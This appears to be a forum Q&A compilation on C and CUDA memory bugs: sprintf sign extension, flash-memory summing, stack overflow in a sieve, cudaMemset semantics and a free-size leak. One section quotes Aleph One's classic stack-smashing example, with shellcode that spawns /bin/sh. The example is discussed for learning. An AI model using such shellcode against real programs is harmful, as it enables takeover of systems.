Buffer overrun issue reported by static code analysis tool

My piece of code:
void temp(char *source)
{
char dest[41];
for(int i = 0; i < 20; i++)
{
sprintf(&dest[i*2], "%02x", (unsigned int)source[i]);
}
}
When I run the static code analysis tool, I get the warning below:
On 19th iteration of the loop: This code could write past the end of the buffer pointed to by &dest[i * 2]. &dest[i * 2] evaluates to [dest + 38]. sprintf() writes up to 9 bytes starting at offset 38 from the beginning of the buffer pointed to by &dest[i * 2], whose capacity is 41 bytes. The number of bytes written could exceed the number of allocated bytes beyond that offset. The overrun occurs in stack memory.
My question is: since in every loop iteration, we are only copying 2 bytes (considering size of unsigned int on the machine is 2 bytes) from source to destination, where is the possibility of copying 9 bytes on the last iteration?

char can be signed, and is so by default in x86 compilers. On my computer
#include <stdio.h>
int main(void) {
printf("%02x\n", (unsigned int)(char)128);
}
prints ffffff80.
What you want to do is use format "%02hhx" and argument (unsigned char)c.
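A minimal sketch of the fix, assuming a hypothetical helper named hex_encode that is not part of the original code. It converts each byte through unsigned char before widening it, so a negative char cannot sign-extend into eight hex digits, and it uses snprintf so that each write is bounded by the space left in dest:

```c
#include <stdio.h>
#include <stddef.h>

/* Hypothetical helper: writes 2*len hex digits plus a terminating '\0'
   into dest. Returns 0 on success, -1 if dest is too small. */
static int hex_encode(const char *source, size_t len, char *dest, size_t dest_size)
{
    if (dest_size < 2 * len + 1)
        return -1;
    for (size_t i = 0; i < len; i++) {
        /* Going through unsigned char keeps the value in 0..255,
           so "%02x" always produces exactly two digits. */
        snprintf(&dest[i * 2], dest_size - i * 2, "%02x",
                 (unsigned int)(unsigned char)source[i]);
    }
    dest[2 * len] = '\0'; /* also covers the len == 0 case */
    return 0;
}
```

With a 41-byte dest and len equal to 20 this fills the buffer exactly, which is the case the analyzer could not prove safe in the original loop.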

Related

C: Read values of entire flash memory of MCU

I want to read the values of the memory locations of the entire program flash memory of an MCU, in particular, the CC2538 on the OpenMote-CC2538. The read values are then computed into, currently, a large sum of all the values.
At this moment, I have the following code working to traverse the memory and get the values
uint64_t readMemory() {
unsigned char * bytes = (char *) 0x200000;
size_t size = 0x0007FFD4;
size_t i;
uint64_t amount = 0;
for (i = 0; i < size; i++) {
amount += bytes[i];
}
return amount;
}
uint64_t readFlashMemory() {
unsigned int * bytes = (int *) 0x200000;
size_t size = 0x0007FFD4;
size_t i;
uint64_t amount = 0;
for (i = 0; i < size; i+=4) {
amount += FlashGet(bytes);
bytes++;
}
return amount;
}
The flash memory starts at address 0x200000 and its size is 0x0007FFD4. The first function works with a char and goes to each address one by one, while the second one uses an existing function FlashGet(uint32_t) from the flash.c file, which is a direct access to a register (HWREG).
FlashGet requires a uint32_t address and returns a uint32_t value, so it reads 4 bytes at a time and the address should advance by 4 in the loop. The first function uses char for the addressing, which has a length of 1, so the address should advance by 1 in the loop. Am I correct in these statements? If so, am I executing them correctly? For the second function, incrementing the pointer by 1 should move it by 4 bytes because it points to a 4-byte type (unsigned int, the same size as uint32_t here).
However, the functions return a different value.
The first one returns: 674426297757
The second one returns: 8213668631160
As both functions should be doing the same thing, one or both must be incorrect and not reading the entire program flash memory.
How can I fix both functions? Is there a better or easier way to read the entire memory when you have the starting address and size?

Consider you have a 4-byte flash memory with content
00 01 02 03
Adding by byte values will give you 0x0000000000000006
Adding by 32-bit int values will give you 0x0000000003020100 assuming little-endian.
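The difference can be checked on a small buffer. The sketch below is an illustration only: sum_bytes and sum_words_le are hypothetical names, and the words are assembled explicitly in little-endian order so the result does not depend on the host:

```c
#include <stdint.h>
#include <stddef.h>

/* Sum of the individual byte values. */
static uint64_t sum_bytes(const unsigned char *p, size_t size)
{
    uint64_t sum = 0;
    for (size_t i = 0; i < size; i++)
        sum += p[i];
    return sum;
}

/* Sum of the 32-bit words, each assembled in little-endian order.
   Trailing bytes that do not form a full word are ignored. */
static uint64_t sum_words_le(const unsigned char *p, size_t size)
{
    uint64_t sum = 0;
    for (size_t i = 0; i + 4 <= size; i += 4) {
        uint32_t word = (uint32_t)p[i]
                      | ((uint32_t)p[i + 1] << 8)
                      | ((uint32_t)p[i + 2] << 16)
                      | ((uint32_t)p[i + 3] << 24);
        sum += word;
    }
    return sum;
}
```

For the four bytes 00 01 02 03, sum_bytes gives 6 and sum_words_le gives 0x03020100, so the two functions in the question are expected to return different totals even when both read the whole memory.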

Understanding Aleph One's first buffer overflow exploit

I am reading "Smashing The Stack For Fun And Profit" by Aleph one, and reached this spot:
overflow1.c
------------------------------------------------------------------------------
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
char large_string[128];
void main() {
char buffer[96];
int i;
long *long_ptr = (long *) large_string;
for (i = 0; i < 32; i++)
*(long_ptr + i) = (int) buffer;
for (i = 0; i < strlen(shellcode); i++)
large_string[i] = shellcode[i];
strcpy(buffer,large_string);
}
Now, I understand all the theory behind the exploit:
the shellcode[] is in the data segment (which is writable), and contains the code to spawn a shell.
We would like to copy its content to main's buffer and, in addition, overwrite main's return address with the address of the beginning of the buffer (so that execution is transferred to our "spawning a shell" code). We do it by copying the shellcode to the large_string[] buffer (second for-loop), and the rest(???) of large_string[] will contain the buffer's address (first for-loop).
Of course, main's return address will be overwritten by this buffer's address, since we copy large_string[] to buffer[] (strcpy).
My problem is with the little details of the exploit:
1.)
Why does the first for-loop run from i=0 to i=31? I mean, considering the pointer arithmetic, how does it work? [large_string[] is only 128 bytes]
2.)
What is strlen(shellcode)?
I would like some clarification on that kind of stuff.
Thanks!

1) Why does the first for-loop run from i=0 to i=31? I mean, considering the pointer arithmetic, how does it work? [large_string[] is only 128 bytes]
It writes four bytes at a time: long_ptr + i advances by sizeof(long) bytes per step (the code relies on sizeof(long) being 4 on the target platform), and 32 * 4 == 128.
2) What is strlen(shellcode)?
It's the number of bytes in shellcode before the terminating \0 (this relies on the fact that shellcode does not contain embedded \0 characters).
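The arithmetic can be illustrated without the exploit itself. This is a sketch under assumptions: fill_words is a hypothetical helper, and uint32_t stands in for the 4-byte long of the original 32-bit target:

```c
#include <stdint.h>
#include <string.h>
#include <stddef.h>

/* Fills buf with copies of one 4-byte value, one word per iteration,
   and returns the number of bytes written. */
static size_t fill_words(unsigned char *buf, size_t buf_size, uint32_t value)
{
    size_t count = buf_size / sizeof value; /* 128 / 4 == 32 iterations */
    for (size_t i = 0; i < count; i++)
        memcpy(buf + i * sizeof value, &value, sizeof value);
    return count * sizeof value;
}
```

For a 128-byte buffer the loop runs 32 times and touches all 128 bytes, which is why the original loop stops at i == 31. Likewise, strlen counts bytes up to the first \0, so strlen("ab\0cd") is 2.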

Sieve of Eratosthenes : SIGSEGV?

I have written the code for the sieve but the program runs for only array size less than or equal to 1000000. For the rest of the cases which are larger, a simple SIGSEGV occurs. Can this be made to run cases > 1000000. Or where am I wrong?
#include <stdio.h>
int main()
{
unsigned long long int arr[10000001] = {[0 ... 10000000] = 0};
unsigned long long int c=0,i,j,a,b;
scanf("%llu%llu",&a,&b);
for(i=2;i<=b;i++)
if(arr[i] == 0)
for(j=2*i;j<=b;j+=i)
arr[j] = 1;
for(i=(a>2)?a:2;i<=b;i++)
if(arr[i] == 0)
c++;
printf("%llu",c);
return 0;
}

This line allocates memory on the stack (which is a limited resource)
unsigned long long int arr[10000001] = {[0 ... 10000000] = 0};
If you are allocating 10,000,000 entries at 4 bytes each, that is 40 million bytes, which will be more than your stack can handle.
(In fact, an unsigned long long is at least 8 bytes, so this array needs at least 80 million bytes!)
Instead, allocate the memory from the heap, which is much more plentiful:
int *arr = malloc(10000001 * sizeof(int));
Or, if you want the memory initialized to zero, use calloc.
Then at the end of your program be sure you also free it:
free(arr);
PS The syntax {[0 ... 10000000] = 0}; is needlessly verbose.
To initialize an array to zero, simply:
int arr[100] = {0}; // That's all!
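Putting this together, here is a minimal sketch of the sieve with heap storage. The function name count_primes is an assumption for illustration, and it uses one byte per flag instead of an 8-byte unsigned long long, which cuts the memory use by a factor of eight:

```c
#include <stdlib.h>

/* Counts the primes in [a, b] using a sieve stored on the heap.
   Returns -1 if the allocation fails. */
static long long count_primes(unsigned long long a, unsigned long long b)
{
    if (b < 2 || a > b)
        return 0;

    /* calloc zero-initializes, so every entry starts as "not composite". */
    unsigned char *composite = calloc((size_t)b + 1, sizeof *composite);
    if (composite == NULL)
        return -1;

    for (unsigned long long i = 2; i * i <= b; i++)
        if (!composite[i])
            for (unsigned long long j = i * i; j <= b; j += i)
                composite[j] = 1;

    long long count = 0;
    for (unsigned long long i = (a > 2) ? a : 2; i <= b; i++)
        if (!composite[i])
            count++;

    free(composite);
    return count;
}
```

Checking the return value of calloc matters here: a failed heap allocation is reported cleanly, whereas an oversized stack array simply crashes.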

You declared an array that can hold 10000001 items; if you want to handle larger numbers, you need a bigger array. I'm mildly surprised that it works for 1000000 already - that's a lot of stack space to be using.
Edit: sorry - didn't notice you had a different number of zeroes there. Don't use the stack to allocate your array and you should be fine. Just add static to the array declaration and you'll probably be okay.

Strange behaviour of an elementary CUDA code.

I am having trouble understanding the output of the following simple CUDA code. All that the code does is allocate two integer arrays: one on the host and one on the device each of size 16. It then sets the device array elements to the integer value 3 and then copies these values into the host_array where all the elements are then printed out.
#include <stdlib.h>
#include <stdio.h>
int main(void)
{
int num_elements = 16;
int num_bytes = num_elements * sizeof(int);
int *device_array = 0;
int *host_array = 0;
// malloc host memory
host_array = (int*)malloc(num_bytes);
// cudaMalloc device memory
cudaMalloc((void**)&device_array, num_bytes);
// Constant out the device array with cudaMemset
cudaMemset(device_array, 3, num_bytes);
// copy the contents of the device array to the host
cudaMemcpy(host_array, device_array, num_bytes, cudaMemcpyDeviceToHost);
// print out the result element by element
for(int i = 0; i < num_elements; ++i)
printf("%i\n", *(host_array+i));
// use free to deallocate the host array
free(host_array);
// use cudaFree to deallocate the device array
cudaFree(device_array);
return 0;
}
The output of this program is 50529027 printed line by line 16 times.
50529027
50529027
50529027
..
..
..
50529027
50529027
Where did this number come from? When I replace 3 with 0 in the cudaMemset call then I get correct behaviour. i.e.
0 printed line by line 16 times.
I compiled the code with nvcc test.cu on Ubuntu 10.10 with CUDA 4.0

I'm no cuda expert but 50529027 is 0x03030303 in hex. This means cudaMemset sets each byte in the array to 3 and not each int. This is not surprising given the signature of cuda memset (to pass in the number of bytes to set) and the general semantics of memset operations.
Edit: As to your (I guess) implicit question of how to achieve what you intended I think you have to write a loop and initialize each array element.
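The byte-wise behaviour and the loop alternative can both be seen in plain host C. This is only a sketch: int_after_memset and fill_ints are hypothetical helper names, and an int is assumed to be 4 bytes. A host array filled this way could then be copied to the device with cudaMemcpy and cudaMemcpyHostToDevice:

```c
#include <string.h>
#include <stddef.h>

/* Returns the int produced when every byte of it is set to `byte`. */
static int int_after_memset(int byte)
{
    int x;
    memset(&x, byte, sizeof x);
    return x;
}

/* Sets every element (not every byte) of the array to `value`. */
static void fill_ints(int *array, size_t count, int value)
{
    for (size_t i = 0; i < count; i++)
        array[i] = value;
}
```

With 4-byte ints, int_after_memset(3) is 0x03030303, which is 50529027 in decimal, while fill_ints stores the value 3 in each element.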

As others have pointed out, cudaMemset works like the standard C memset: it sets byte values. From the CUDA documentation:
cudaError_t cudaMemset( void * devPtr, int value, size_t count)
Fills the first count bytes of the memory area pointed to by devPtr
with the constant byte value value.
If you want to set word size values, the best solution is to use your own memset kernel, perhaps something like this:
template<typename T>
__global__ void myMemset(T * x, T value, size_t count )
{
size_t tid = threadIdx.x + blockIdx.x * blockDim.x;
size_t stride = blockDim.x * gridDim.x;
for(size_t i=tid; i<count; i+=stride) {
x[i] = value;
}
}
which could be launched with enough blocks to cover the number of multiprocessors in your GPU, and each thread will do as many iterations as required to fill the memory allocation. Writes will be coalesced, so performance shouldn't be too bad. This could also be adapted to CUDA's vector types, if you so desired.

memset sets bytes, and an integer is 4 bytes, so what you get is 50529027 decimal, which is 0x03030303 in hex. In other words, you are using it wrong, and it has nothing to do with CUDA.

This is a classic memset shortcoming: it fills memory byte by byte, so it gives the expected result only for 8-bit types such as char. Here it writes the value 3 into every byte of the memory. You can confirm this with a simple C++ program:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main ()
{
int x=16;
size_t bytes = x*sizeof(int);
int *M = (int*)malloc(bytes);
if (M == NULL) return 1;
memset(M,3,bytes); // fills every byte with 3, not every int
for (int i = 0; i < x; ++i) {
printf("%d\n", M[i]);
}
free(M);
return 0;
}
The usual case in which memset gives the expected result for integer types is the value 0 (it sets every byte to 0 and hence every element to 0). If you change the data type to char, you'll see the desired output. cudaMemset behaves just like memset, the only difference being that it takes a GPU pointer as input.
So memset or cudaMemset sets every byte of the memory range defined by the third argument to the given value (in your case 3), regardless of the data type.
Tip:
Google: 50529027 in binary and you'll get the answer :)

Memory loss in following code when the CPU is 32 bit processor

I have a function to convert an integer to a string. The function is
char * Int_String(int Number)
{
char* result;
NAT size = 1;
if (Number > 9) {
size = (NAT)log10((double) Number) + 1;
} else if (Number < 0) {
size = (NAT)log10((double) abs(Number)) + 2; /* including '-' */
}
size++; /* for '\0' */
result = (char *) memory_Malloc(sizeof(char) * size);
sprintf(result, "%d", Number);
return result;
}
NAT is typedef unsigned int
Number is int
I am using this function in the following manner
char *s2;
char **Connections;
Connections = memory_Malloc(nc*sizeof(char*));
char con[]="c_";
k1=1;
for (i=0; i<nc ; i++){
s2 = Int_ToString(k1);
Connections[i]= string_Conc(con,s2);
string_StringFree(s2);
k1= k1+1;
}
And the function char* string_Conc(const char *s1, const char *s2) is
{
char* dst;
dst = memory_Malloc(strlen(s1) + strlen(s2) + 1);
strcpy(dst, s1);
return strcat(dst,s2);
}
I am using following methods to free its memory:
for(i=0; i<nc; i++){
memory_Free(Connections[i],sizeof(char));
}
memory_Free(Connections,nc*sizeof(char*));
The problem I am getting is: I can free all the allocated memory when nc<=9. But when it is >=10, it leaks memory in multiples of 4 bytes with each increase in the number. How can I fix this problem? Any help will be appreciated.
EDIT
void memory_Free(POINTER Freepointer, unsigned int Size)
Thanks,
thetna

You don't show the implementation of memory_Free (nor memory_Malloc), so we don't know why you need to pass the supposed size of the memory block to be freed as a 2nd parameter (the standard free() doesn't need this). However, here
memory_Free(Connections[i],sizeof(char));
it is certainly wrong: sizeof(char) is always 1, but the size of the allocated block is at least 4 bytes for each string in the array (as the strings contain "c_" plus at least one digit plus the terminating '\0').
Update
Looking through the source code you linked, this indeed seems to be the cause of your problem! The code inside memory_Free seems to align memory block sizes, I assume to 4-byte boundaries, which is very common. In this case, if the passed Size is 1, it happens to be corrected to 4, which is exactly the right value for single-digit numbers as shown above! However, numbers greater than 9 are converted to (at least) two digits, thus the size of the converted string is already 5. A block of 5 bytes is most probably allocated as an aligned block of 8 bytes under the hood, but since memory_Free is always called with a Size of 1, it always frees only 4 bytes. This leaves 4 bytes leaking for each number above 9, precisely as you described in your comment above!
To fix this, you need to modify the line above to
memory_Free(Connections[i], strlen(Connections[i]) + 1);
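The accounting can be reproduced with a toy model. Everything in this sketch is an assumption made for illustration: tracked_malloc, tracked_free and leak_after are hypothetical stand-ins, not the real memory_Malloc and memory_Free, and sizes are assumed to be rounded up to a multiple of 4 bytes:

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

static size_t bytes_in_use = 0; /* what the toy allocator believes is live */

static size_t align4(size_t n) { return (n + 3u) & ~(size_t)3u; }

static void *tracked_malloc(size_t size)
{
    void *p = malloc(size);
    if (p != NULL)
        bytes_in_use += align4(size);
    return p;
}

static void tracked_free(void *p, size_t size)
{
    bytes_in_use -= align4(size); /* trusts the caller's size */
    free(p);
}

/* Allocates "c_1" .. "c_<nc>", frees each one, and returns the bytes
   the allocator still counts as live afterwards. */
static size_t leak_after(int nc, int use_correct_size)
{
    bytes_in_use = 0;
    for (int i = 1; i <= nc; i++) {
        char text[32];
        snprintf(text, sizeof text, "c_%d", i);
        size_t len = strlen(text) + 1;
        char *s = tracked_malloc(len);
        if (s == NULL)
            return (size_t)-1;
        memcpy(s, text, len);
        tracked_free(s, use_correct_size ? len : sizeof(char));
    }
    return bytes_in_use;
}
```

In this model, freeing with sizeof(char) reports no leak for nc up to 9 and 4 more bytes for every string from "c_10" onward, while freeing with strlen + 1 always balances to zero.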